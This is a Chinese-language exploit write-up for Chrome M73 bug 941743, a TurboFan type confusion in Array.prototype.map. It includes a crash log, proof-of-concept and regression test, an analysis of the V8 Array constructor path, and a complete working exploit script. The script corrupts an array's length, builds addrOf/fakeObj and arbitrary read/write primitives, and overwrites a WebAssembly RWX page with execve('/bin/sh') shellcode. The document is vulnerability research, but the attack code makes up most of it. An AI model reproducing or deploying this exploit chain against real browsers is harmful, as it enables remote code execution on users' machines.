Chrome M73 issue 941743

1. bug info

这是科恩实验室(Keen Lab)2019 年 Black Hat USA 议题中那套利用链的 RCE 部分,是一个 V8 JIT 优化(TurboFan)相关的漏洞。

类型混淆漏洞。

➜  ~ ~/v8/v8/out/x64.debug/d8    ~/chrome_M73_crbug941743_RCE/raw_poc.js 


#
# Fatal error in ../../src/elements.cc, line 881
# Debug check failed: IsFastElementsKind(from_kind).
#
#
#
#FailureMessage Object: 0x7fff3b6caa70
==== C stack trace ===============================

/home/jack/v8/v8/out/x64.debug/libv8_libbase.so(v8::base::debug::StackTrace::StackTrace()+0x1e) [0x7f95be106e1e]
/home/jack/v8/v8/out/x64.debug/libv8_libplatform.so(+0x2d527) [0x7f95be0ac527]
/home/jack/v8/v8/out/x64.debug/libv8_libbase.so(V8_Fatal(char const*, int, char const*, ...)+0x218) [0x7f95be0f4fb8]
/home/jack/v8/v8/out/x64.debug/libv8_libbase.so(+0x349fc) [0x7f95be0f49fc]
/home/jack/v8/v8/out/x64.debug/libv8_libbase.so(V8_Dcheck(char const*, int, char const*)+0x32) [0x7f95be0f5092]
/home/jack/v8/v8/out/x64.debug/libv8.so(+0x1585f80) [0x7f95bcf27f80]
/home/jack/v8/v8/out/x64.debug/libv8.so(+0x1582a31) [0x7f95bcf24a31]
/home/jack/v8/v8/out/x64.debug/libv8.so(+0x1a8b5b8) [0x7f95bd42d5b8]
/home/jack/v8/v8/out/x64.debug/libv8.so(v8::internal::Runtime_TransitionElementsKind(int, unsigned long*, v8::internal::Isolate*)+0x117) [0x7f95bd42d247]
/home/jack/v8/v8/out/x64.debug/libv8.so(+0x212bd00) [0x7f95bdacdd00]
Received signal 4 ILL_ILLOPN 7f95be104581
[1] 8542 illegal hardware instruction (core dumped) ~/v8/v8/out/x64.debug/d8 ~/chrome_M73_crbug941743_RCE/raw_poc.js

2. poc

// Impact version: 6.1.462+ 
// Minimal trigger: grow `arr` from inside its own map() callback so that the
// result array that the optimized Array.prototype.map builds eventually has a
// length that no longer matches the fast elements kind TurboFan assumed for it
// (in a debug build this trips the IsFastElementsKind DCHECK shown above).
var arr = [1];
for (var i = 1; i < 300; ++i) {
// map() fixes the iteration count from arr.length up front; the callback pushes
// one element per visit, so arr doubles in size on every round and soon reaches
// a length for which the Array constructor would produce dictionary elements.
var a2 = arr.map(function (v, i) {
arr.push(1);
});
// some() invokes the callback as Array(value, index, array) for each element;
// presumably this trains the Array constructor's call-site feedback — TODO confirm.
arr.some(arr.constructor);
// Busy loop between rounds, presumably to give the optimizing compiler a chance
// to kick in on the hot code.
for (var j = 0; j < 1000000; ++j) {}
}
```

1. array.map 方法,对 array 中每个元素执行回调,并把回调的返回值收集成一个新数组返回(这里回调里又对 arr 做 push,边遍历边增长原数组)
2. array.some 方法,对每个元素调用回调,检测是否存在使回调返回真值的元素;这里把 arr.constructor(即 Array)当作回调,等价于每次调用 Array(value, index, array),推测是为了训练 Array 构造函数的调用反馈。


![]( https://blogimg-10065924.cos.ap-shanghai.myqcloud.com/Chrome-M73-issue-941743/15904645923418.jpg)



漏洞修补 commit 里附带的回归测试(regression test)就是下面这个 poc:

```javascript
// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --noenable-slow-asserts
// (%OptimizeFunctionOnNextCall below is d8 natives syntax; this is a V8
// regression test and does not run in a browser or Node as-is.)

// This call ensures that TurboFan won't inline array constructors.
// A Smi length this large takes the "would normalize" branch of the Array
// constructor, which turns off allocation-site type feedback for it.
Array(2**30);
// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
function mapping(a) {
return a.map(v => v);
}
// Two warm-up calls collect feedback; the third call runs the TurboFan code,
// which inlines Array.prototype.map with the result array assumed to have the
// same fast (holey smi) elements as `a`.
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
// 32M-1 is presumably chosen to sit just under the length at which the Array
// constructor would normalize (verify against kMaxFastArrayLength for this
// V8 version); fill() materialises the elements so `a` keeps a fast backing
// store, and push()/length += 500 then push the length past that limit while
// `a` itself stays fast.
a.length = (32 * 1024 * 1024)-1;
a.fill(1,0);
a.push(2);
a.length += 500;
// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
// The optimized code still stores into that result as if it were a fast
// elements array: that mismatch is the type confusion.
mapping(a);

```

3. bug analysis

作者的分析:

  1. The optimization of JSCreateArray (for |a2|) bailout at typed lowering phase. When executing JITed code, it calls to |Runtime_NewArray|.
  2. There’s a CheckMaps for |arr|, but it can’t ensure an array that produced by |arr| is the same type. For example, |arr| is extended by |push| and it has PACKED_SMI_ELEMENTS, but |a2| could be constructed by |Runtime_NewArray| and it could have DICTIONARY_ELEMENTS.
  3. TransitionAndStoreElement assumes the source array should be HOLEY_SMI_ELEMENTS, this can’t ensure either. Because when calling to |Runtime_NewArray| and array’s actual length >= 0x4000000, there’ll be a dictionary elements array. So our bug occurs.

issue-941743-cve-2019-5825

为什么开始需要一个 Array(2 ** 30)

// Excerpt from V8's Array constructor path: classify the single length
// argument to decide whether allocation-site type feedback may be used and
// whether TurboFan may inline the constructor. The enclosing function and the
// declarations of argv, isolate, holey, can_use_type_feedback and
// can_inline_array_constructor are outside this excerpt.
if (argv.length() == 1) {
Handle<Object> argument_one = argv.at<Object>(0);
if (argument_one->IsSmi()) {
int value = Handle<Smi>::cast(argument_one)->value();
// A negative length, or one large enough that setting it would normalize the
// elements to a dictionary, disables type feedback entirely. This is
// presumably the branch Array(2**30) takes in the PoC (2**30 is a Smi on x64
// and exceeds the fast-array length limit).
if (value < 0 ||
JSArray::SetLengthWouldNormalize(isolate->heap(), value)) {
// the array is a dictionary in this case.
can_use_type_feedback = false;
} else if (value != 0) {
// Any other non-zero length yields a holey array; from
// kInitialMaxFastElementArray upwards it is still fast but no longer
// eligible for constructor inlining.
holey = true;
if (value >= JSArray::kInitialMaxFastElementArray) {
can_inline_array_constructor = false;
}
}
} else {
// Non-smi length argument produces a dictionary
can_use_type_feedback = false;
}
}

所以只要让 can_use_type_feedback = false 即可:2**30 在 x64 上是一个 Smi,并且 SetLengthWouldNormalize 对它返回 true,于是 Array 构造函数的类型反馈被关闭;按回归测试里的注释,这样 TurboFan 就不会内联 Array 构造函数,后面的 a2 只能走 Runtime_NewArray 这条路径分配。

4. how to exploit?

先构造一个长度被改大的 oob_array;用它越界改写紧随其后的 ArrayBuffer 的 backing store 指针得到任意地址读写;再用它越界读写 leak_obj 的属性槽实现 addrOf / fakeObj 原语。

5. exploit


/*

exploit for crbug-941743

*/

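// true when running under d8 (which exposes print()); false for a
// console.log() host such as a browser or Node. Declared with `var` so it
// stays a global like the original implicit assignment, without relying on
// sloppy-mode implicit globals (which strict mode rejects).
var is_in_v8_flag = true;

// =================================================================
// toolkit
// =================================================================
// One 16-byte buffer shared by two views: writing a double through g_float64
// and reading the same bytes back through g_uint64 (and vice versa) converts
// between a JS number and its raw 64-bit bit pattern.
var g_buffer = new ArrayBuffer(16);
var g_float64 = new Float64Array(g_buffer);
var g_uint64 = new BigUint64Array(g_buffer);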


/**
 * Reinterpret the bits of a double as an unsigned 64-bit integer.
 * The value goes through the shared g_buffer: stored as a float64, the same
 * 8 bytes are read back as a BigUint64.
 * @param {number} f - double whose raw bit pattern is wanted
 * @returns {bigint} the 64-bit pattern of `f`
 */
function float2address(f) {
  const slot = 0;
  g_float64[slot] = f;
  const bits = g_uint64[slot];
  return bits;
}


function address2float(addr) {
let i = BigInt(addr);
g_uint64[0] = i;
return g_float64[0];
}


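/**
 * Format an integer as "0x" followed by 16 zero-padded hex digits.
 * Works for Number and BigInt (both provide toString(radix)).
 * The original called padStart('0'), i.e. a target length of 0 with the
 * default space pad, which never padded anything; the intent for 64-bit
 * addresses is a 16-digit field padded with '0'.
 * @param {number|bigint} i - value to format
 * @returns {string} e.g. "0x0000000000001234"
 */
function hex(i) {
  return '0x' + i.toString(16).padStart(16, '0');
}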


/**
 * Print an informational line, prefixed with "[+] ", via console.log.
 * @param {string} msg - text to print after the prefix
 */
function info(msg) {
  const line = '[+] ' + msg;
  console.log(line);
}

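/**
 * Log an error line, prefixed with "[-] ", and terminate the script.
 * The original called exit(1), which is defined neither in d8 (it provides
 * quit()) nor in Node (process.exit()) and so would raise a ReferenceError
 * instead of exiting. This tries the host-provided terminators in turn and
 * finally throws, so the caller never continues past an error().
 * @param {string} msg - text to print after the prefix
 * @throws {Error} when no host exit function is available
 */
function error(msg) {
  console.log('[-] ' + msg);
  if (typeof quit === 'function') {
    quit(1);
  }
  if (typeof process !== 'undefined' && typeof process.exit === 'function') {
    process.exit(1);
  }
  throw new Error(msg);
}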

/**
 * Put allocation pressure on the heap to encourage a garbage collection:
 * allocates 100 throw-away 1 MiB ArrayBuffers and drops them. Returns
 * nothing; whether a GC actually runs is up to the engine.
 */
function gc() {
  let rounds = 100;
  while (rounds > 0) {
    void new ArrayBuffer(0x100000);
    rounds -= 1;
  }
}

/**
 * Print a line with whichever output function the host provides: d8's
 * print() when is_in_v8_flag is set, console.log() otherwise.
 * @param {*} msg - value to print
 */
function myprint(msg) {
  if (!is_in_v8_flag) {
    console.log(msg);
    return;
  }
  print(msg);
}


// =================================================================
// exploit part
// =================================================================

// Number of warm-up calls to inline() before it is expected to be optimized
// (no --allow-natives-syntax needed), and how many oob_array slots are
// scanned for the marker values.
var max_iters = 10000;
var max_search = 0x10000;

// Purpose not documented by the author; presumably a warm-up/feedback call
// for the Array constructor — TODO confirm.
Array(32760);

// This call ensures that TurboFan won't inline array constructors.
// (A Smi length this large takes the "would normalize" path in the Array
// constructor, which disables its type feedback.)
Array(2**30);
// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];

// Filled in by the map callback inside inline(): the array whose length gets
// corrupted, the object used for addrOf/fakeObj, and the ArrayBuffer whose
// backing-store pointer is redirected for read64/write32.
let oob_array;
let leak_obj;
let rw_arraybuffer;
let obj = {}; //using for leak_obj

// Presumably the distance, in 8-byte slots, from the map result's element
// storage to oob_array's JSArray length field, and to the length field of
// its elements FixedArray (6 slots earlier). Build- and allocation-specific.
let oob_array_length_offset = 23; // get this by debugging
let oob_array_storage_length_offset = oob_array_length_offset - 6;


/**
 * The function that gets JIT-compiled. Maps over the global `a`; the callback
 * is where the exploit does its work:
 *  - at index 0 it allocates the three victim objects, presumably right after
 *    the map result array: oob_array, then leak_obj with a recognisable
 *    marker in `m`, then an ArrayBuffer of the recognisable size 0x4321;
 *  - it returns `index`, so the value stored into the result array at
 *    position i is the Smi i — that is the controlled write;
 *  - at index 24 it throws, so no further stores happen once the slot for
 *    oob_array's length (index 23) has been hit.
 * Keep the shape of this function as is: changing it changes what TurboFan
 * generates and whether the bug is reachable.
 */
function inline(){
return a.map(
(value, index) =>{
if (index == 0){
oob_array = [1.1, 2.2];

leak_obj = {m:address2float(0xdeadbeef), n:obj};
rw_arraybuffer = new ArrayBuffer(0x4321);
}
// Stop right after the length slot (index 23) has been written.
if (index == oob_array_length_offset +1 ){
throw "oob finished..."
}
return index;
});
}

// Warm up: 10001 calls with the small `a` so TurboFan optimizes inline() (and
// its inlined Array.prototype.map) with `a` observed as HOLEY_SMI. During
// warm-up the callback never reaches index 24, so it never throws.
inline();
for(var i = 0; i < max_iters; ++i) inline();

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
// Unlike the regression test, only two spots are filled: index 17 (the
// presumed slot of oob_array's elements-store length) and 23 onwards (the
// presumed slot of oob_array's JSArray length). map() skips holes, so the
// callback runs for the literal's 0, 1, 5 and then for 17, 23, 24 (which
// throws), storing `index` (17, then 23) into the result array there. Per the
// author's analysis that result array is dictionary-backed while the
// optimized code still treats it as fast elements, so those stores presumably
// land on oob_array, allocated behind it by the index-0 callback.
a.length = (32 * 1024 * 1024)-1;
a.fill(1, oob_array_storage_length_offset, oob_array_storage_length_offset + 1);
a.fill(1, oob_array_length_offset);
a.length += 500;


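// Slot indices into oob_array (found by the marker scans in the driver
// below): the slot holding leak_obj.n, and the slot holding rw_arraybuffer's
// backing-store pointer. 0 means "not found yet"; the driver aborts if either
// stays 0. Declared with `var` rather than as implicit globals, which sloppy
// mode creates silently and strict mode rejects.
var leak_obj_offset = 0;
var rw_arraybuffer_offset = 0;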

/**
 * Leak the (tagged) address of a JS object.
 * Stores `obj` into leak_obj.n and reads that property slot back through the
 * out-of-bounds oob_array as a double, whose bit pattern is the pointer.
 * The Number conversion is exact only while the pointer fits in 53 bits
 * (true for the 47-bit user-space addresses this targets).
 * @param {object} obj - object whose address is wanted
 * @returns {number} tagged heap pointer of obj
 */
function addrOf(obj) {
  leak_obj.n = obj;
  const raw = oob_array[leak_obj_offset];
  return Number(float2address(raw));
}

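/**
 * Turn an address into a JS object reference: write the (tagged) pointer
 * into leak_obj's `n` slot through oob_array, then read `n` back.
 * Bug fixed: the original wrote Number(float2address(obj_address)), which
 * reinterprets the address as a double and stores the raw bits of that
 * double (or throws for a BigInt), so the fake pointer was garbage. The
 * slot must receive the double whose bits ARE the address — address2float(),
 * exactly as read64()/write32() do for rw_arraybuffer. (fakeObj is not
 * called by the exploit, which is why this went unnoticed.)
 * @param {number|bigint} obj_address - tagged heap pointer to materialise
 * @returns {object} whatever V8 now sees at leak_obj.n
 */
function fakeObj(obj_address) {
  oob_array[leak_obj_offset] = address2float(obj_address);
  return leak_obj.n;
}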

/**
 * Read 8 bytes at an absolute address through the hijacked ArrayBuffer.
 * The address is stored, as a double, into the oob_array slot that overlaps
 * rw_arraybuffer's backing-store pointer; a DataView created *after* that
 * store then reads from the new location. The DataView is deliberately
 * constructed on every call, after the store (presumably it captures the
 * data pointer at construction time — keep that order).
 * The result is converted to Number, which is exact only up to 2^53 — fine
 * for pointers, lossy for arbitrary data.
 * @param {number|bigint} addr - address to read from
 * @returns {number} the 64-bit value at addr
 */
function read64(addr) {
  oob_array[rw_arraybuffer_offset] = address2float(addr);
  const view = new DataView(rw_arraybuffer);
  const asDouble = view.getFloat64(0, true);
  return Number(float2address(asDouble));
}

// function write64(addr, value){
// oob_array[rw_arraybuffer_offset] = address2float(addr);
// let data_view = new DataView(rw_arraybuffer);
// data_view.setFloat64(0, address2float(value), true);
// }
// NOTE: left disabled by the author. If it is ever re-enabled, the value must
// be converted with address2float() (integer -> double with the same bits),
// not float2address() as originally written, which would reinterpret the
// integer as a double and write that double's raw bits instead.

/**
 * Write a 32-bit little-endian value to an absolute address through the
 * hijacked ArrayBuffer (same redirection trick as read64: store the address
 * into the slot overlapping rw_arraybuffer's backing-store pointer, then
 * create a fresh DataView and write at offset 0).
 * @param {number|bigint} addr - destination address
 * @param {number} value - 32-bit integer to write (wrapped by ToInt32)
 */
function write32(addr, value) {
  oob_array[rw_arraybuffer_offset] = address2float(addr);
  const view = new DataView(rw_arraybuffer);
  view.setInt32(0, value, true);
}

// Minimal WebAssembly module, hand-assembled. Decoded: one function type
// () -> i32, one function, a table, a memory, exports "memory" and "main",
// and a body of `i32.const 10; end` (0x41 0x0a 0x0b at the end). Instantiating
// it gives the exploit a callable whose machine code presumably lives in a
// writable+executable region on this V8 version; that is where the shellcode
// is written below.
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1,
127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0,
1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2,
0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 10, 11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
// The exported function; its address is the starting point for the pointer
// walk to the executable code.
var func = wasmInstance.exports.main;


// Trigger once more, now with the oversized `a`. If the bug fires, inline()
// throws "oob finished..." at index 24 and the exploit continues in the catch
// block; if it does not fire, nothing below runs (silent failure).
try{
inline();
}catch(e){
// The store of `index` (23) into the dictionary-backed result array is
// presumably what landed in oob_array's length field; any length > 2 means
// the corruption worked.
if(oob_array.length > 2){
myprint("[+] oob successed!");
myprint("[+] oob_array length is : " + oob_array.length);
}else{
throw "oob Failed"
}

// Scan past oob_array's real elements for leak_obj's marker: `m` holds the
// double with bit pattern 0xdeadbeef, so the slot after it is presumably the
// in-object property `n`.
// NOTE: `==` is deliberate — `value` is a BigInt and the literal a Number;
// strict `===` between the two is always false.
for(var i = 0; i < max_search; ++i){
var value = float2address(oob_array[i]);
if(value == 0xdeadbeef){
leak_obj_offset = i + 1;
break;
}
}

// Same scan for rw_arraybuffer: 0x4321 is its byte length, and the slot after
// it is presumably the backing-store pointer that read64/write32 overwrite.
for(var i = 0; i < max_search; ++i){
var value = float2address(oob_array[i]);
if(value == 0x4321){
rw_arraybuffer_offset = i + 1;
break;
}
}

if(leak_obj_offset == 0 || rw_arraybuffer_offset==0) throw "get offset failed"

myprint("[+] leak_obj_offset : " + leak_obj_offset);
myprint("[+] rw_arraybuffer_offset : " + rw_arraybuffer_offset);

// Walk from the exported wasm function to its executable code. `- 1` strips
// the HeapObject tag bit. The field offsets (0x18, 0x8, 0x10, 0x108) are
// specific to this build's (M73, x64) object layouts; verify them with
// %DebugPrint on a debug build before reusing (see the commented lines).
var wasm_func_addr = addrOf(func) - 1;
myprint("[+] wasm func addr : " + hex(wasm_func_addr));

var shared_info = read64(wasm_func_addr + 0x18) - 1;
myprint("[+] wasm shared info : " + hex(shared_info));

var data_address = read64(shared_info + 0x8) - 1;
myprint("[+] data_address : " + hex(data_address));

var instance_address = read64(data_address + 0x10) - 1;
myprint("[+] instance_address : " + hex(instance_address));

// No `- 1` here: presumably a raw (untagged) pointer to the RWX code region.
var rwx_address = read64(instance_address + 0x108);
myprint("[+] rwx_address : " + hex(rwx_address));
// %DebugPrint(func);
// %SystemBreak();

// Overwrite the code with 24 bytes of x86-64 execve("/bin/sh") shellcode,
// written as six little-endian dwords: push 0x3b; pop rax; cdq; push rdx;
// mov rbx, "//bin/sh"; push rbx; push rsp; pop rdi; push rdx; push rdi;
// push rsp; pop rsi; syscall.
write32(rwx_address, 0x99583b6a);
write32(rwx_address + 0x4, 0x2fbb4852);
write32(rwx_address + 0x8, 0x6e69622f);
write32(rwx_address + 0xc, 0x5368732f);
write32(rwx_address + 0x10, 0x57525f54);
write32(rwx_address + 0x14, 0x050f5e54);

// %SystemBreak();
// let's go to the shellcode
// Calling the wasm export now presumably jumps into the overwritten bytes.
func();

}


6. reference

crbug-941743